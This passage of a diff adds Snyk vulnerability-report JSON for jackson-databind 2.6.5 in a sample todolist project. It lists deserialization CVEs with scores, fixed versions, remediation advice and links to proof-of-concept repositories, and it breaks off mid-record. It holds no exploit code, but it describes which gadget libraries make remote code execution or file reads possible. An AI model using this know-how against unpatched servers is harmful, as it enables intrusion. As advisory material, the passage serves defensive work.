"vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": 